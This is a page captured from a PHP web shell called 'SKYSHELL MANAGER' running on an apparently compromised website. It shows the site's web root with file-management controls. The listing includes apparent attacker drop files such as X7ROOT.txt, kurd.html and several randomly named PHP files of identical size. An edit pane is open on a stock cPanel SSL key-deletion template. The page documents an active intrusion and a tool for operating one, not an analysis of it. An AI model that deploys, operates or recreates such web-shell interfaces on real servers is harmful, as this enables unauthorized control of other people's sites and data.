📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: deletekey.html.tt
[% CPANEL.CPVAR.dprefix = '../'; # Delete the select key SET delete_key = execute("SSL", "delete_key", { friendly_name=RAW_FORM('keyname') } ); SET deleted_certs = []; SET deleted_csrs = []; SET error_certs = []; SET error_csrs = []; IF delete_key.status; SET form_cert_keys = RAW_FORM.keys.grep('^delete_cert-'); FOR formkey = form_cert_keys; SET itemname = formkey.replace('^delete_cert-',''); SET delete_cert = execute( 'SSL', 'delete_cert', { friendly_name => itemname } ); IF ( delete_cert.status ); deleted_certs.push( { name_html => itemname.html(), cn_html => delete_cert.data.0.${'subject.commonName'}.html() } ); ELSE; error_certs.push( { name_html => itemname.html(), error_html => delete_cert.errors.0.html() } ); END; END; SET form_csr_keys = RAW_FORM.keys.grep('^delete_csr-'); FOR formkey = form_csr_keys; SET itemname = formkey.replace('^delete_csr-',''); SET delete_csr = execute( 'SSL', 'delete_csr', { friendly_name => itemname } ); IF ( delete_csr.status ); deleted_csrs.push( { name_html => itemname.html(), cn_html => delete_csr.data.0.commonName.html() } ); ELSE; error_csrs.push( { name_html => itemname.html(), error_html => delete_csr.errors.0.html() } ); END; END; END; SET ref = FORM.ref || ''; %] [% js_code = PROCESS js_block %] [% WRAPPER '_assets/master.html.tt' app_key = 'ssl_tls' include_legacy_scripts = 1 include_cjt = 1 page_js = js_code embed_scripts = ["js2/ssl/deletekey.js"] -%] <div class="body-content"> <h2 id="hdrDelete"> [% locale.maketext('Delete Private Key') %] </h2> <div id="delete-status"> [% IF delete_key.status %] <p> [% locale.maketext('The private key has been deleted: [_1]', RAW_FORM.keyname.html()) %] </p> [% IF deleted_certs.size || deleted_csrs.size %] <p class="also"> [% locale.maketext('The following related resources have also been deleted:') %] <ul class="bulleted"> [% FOR item IN deleted_certs -%] <li>[% locale.maketext('Certificate “[_1]”[comment,common name of certificate] - “[_2]”[comment,friendly name of certificate when it is different than the common name]', item.cn_html, item.name_html) %]</li> [% END -%] [% FOR item IN deleted_csrs -%] <li>[% locale.maketext('[output,acronym,CSR,Certificate Signing Request]: [output,strong,_1] - [_2]', item.cn_html, item.name_html) %]</li> [% END %] </ul> <p> [% END %] [% ELSE %] <p> [% locale.maketext('The private key “[_1]” could not be deleted because an error occurred: [_2]', RAW_FORM.keyname.html(), delete_key.errors.0.html()) %] </p> [% END %] </div> [% IF delete_key.status && (error_certs.size || error_csrs.size) %] <div id="dependent-errors"> <p class="also"> [% locale.maketext('The following resources could not be deleted because of errors:') %] <ul> [% FOR item IN error_certs -%] <li>[% locale.maketext('Certificate “[_1]”: [_2]', item.name_html, item.error_html) %]</li> [% END -%] [% FOR item IN error_csrs -%] <li>[% locale.maketext('[output,acronym,CSR,Certificate Signing Request]: [output,strong,_1] - [_2]', item.name_html, item.error_html) %]</li> [% END %] </ul> <p> </div> [% END %] <ul class="list-inline text-center"> [%- IF ref; SWITCH ref; CASE "csrs" -%] <li> [% INCLUDE _assets/return_link.html.tt id_prefix='lnkCSR' return_location='csrs.html?selkey=' _ generate_key.data.id _ '' return_link_text=locale.maketext('Return to SSL Certificate Signing Requests') data_testid='goBackToSSL' %] </li> [%- CASE "crts" -%] <li> [% INCLUDE _assets/return_link.html.tt id_prefix='lnkCRT' return_location='crts.html?selkey=' _ generate_key.data.id _ '' return_link_text=locale.maketext('Return to SSL Certificates') data_testid='goBackToSSL' %] </li> [%- END; END -%] <li> [% IF ref %] [% INCLUDE _assets/return_link.html.tt return_location='keys.html?ref=' _ ref.uri() _ '' return_link_text=locale.maketext('Go Back') %] [% ELSE %] [% INCLUDE _assets/return_link.html.tt return_location='keys.html' return_link_text=locale.maketext('Go Back') %] [% END %] </li> </ul> </div> [% END #wrapper %] [% BLOCK js_block %] <script type="text/javascript"> (function() { /** * This module contains all the page specific constants generated by the server. * @module PAGE.Properties */ var PAGE = { properties : { deleted : [% delete_key.status ? 'true' : 'false' %] } } // Publish the PAGE object; window["PAGE"] = PAGE; })(); </script> [% END %]
Save